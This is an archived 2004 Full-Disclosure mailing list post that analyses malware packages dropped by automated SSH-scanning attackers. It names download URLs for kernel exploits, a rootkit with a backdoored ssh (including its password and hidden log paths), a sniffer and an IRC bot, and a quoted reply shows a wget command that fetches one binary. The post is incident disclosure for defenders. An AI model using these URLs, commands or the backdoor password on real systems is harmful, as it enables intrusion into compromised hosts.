[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <063b01c48bd6$c515d0e0$5746370a@nsp.co.nz>
From: venom at gen-x.co.nz (VeNoMouS)
Subject: Automated ssh scanning
lol the amount of people still trying to work out what these binarys are is
amusing, i already broke down what each package was and mailed it to full
disclosure over 24hrs ago, dont you people read threads?
I'll post it again.....
www.bo2k-rulez.net/a
kernel do_brk exploit by isec -
http://www.k-otik.com/exploits/12.05.hatorihanzo.c.php, infected with rst.b
, which when run tries to connect to 207.66.155.21 on port 80
requesting /~telecom69/gov.php which is offline.
www.corbeanu.as.ro/t.gz
Ptrace/kmod kernel exploit by isec -
http://www.k-otik.com/exploits/03.30.kernel.c.php
http://roarmy.com/god.tgz
root kit with backdoor'd ssh listens on port 26000 which replaces smbd
binary, loggin of the ssh connections goes to /usr/include/iceconf.h , also
has a crappy tcp sniffer which logs to /usr/lib/libice.log,and a syn flooder
***** backdoor password for this ssh door is ice4budu
www.generatiapro.go.ro/fast.tgz
emech setup for undernet to join #tty.
----- Original Message -----
From: "Ron DuFresne" <dufresne@...ternet.com>
To: "Gary E. Miller" <gem@...lim.com>
Cc: "Deigo Dude" <deigodude@....com>; <full-disclosure@...ts.netsys.com>
Sent: Friday, August 27, 2004 11:59 AM
Subject: Re: [Full-Disclosure] Automated ssh scanning
>
> Howdy Gary,
>
>> -----BEGIN PGP SIGNED MESSAGE-----
>> Hash: SHA1
>>
>> Yo All!
>>
>> On Thu, 26 Aug 2004, Deigo Dude wrote:
>>
>> > Maybe running this test again, and this time ...
>>
>> No need to run the test again.
>>
>> - From the .history I duplicated this:
>>
>> wget www.bo2k-rulez.net/a
>>
>> Then did this to see the strings in the binary:
>>
>> strings a | less
>>
>> This string looked ineresting:
>>
>> Kernel seems not to be vulnerable
>>
>> A google on that string yields the exloit:
>>
>> http://www.k-otik.com/exploits/12.05.hatorihanzo.c.php
>>
>> A simple exploit for the well known do_brk bug in the Linux kernel...
>>
>
> Cool, I was incrrect in assuning this was a fully patched system and the
> compromise likely being an application sploit it appears.
>
>
> Thanks,
>
> Ron DuFresne
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> "Cutting the space budget really restores my faith in humanity. It
> eliminates dreams, goals, and ideals and lets us get straight to the
> business of hate, debauchery, and self-annihilation." -- Johnny Hart
> ***testing, only testing, and damn good at it too!***
>
> OK, so you're a Ph.D. Just don't touch anything.
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>
Powered by blists - more mailing lists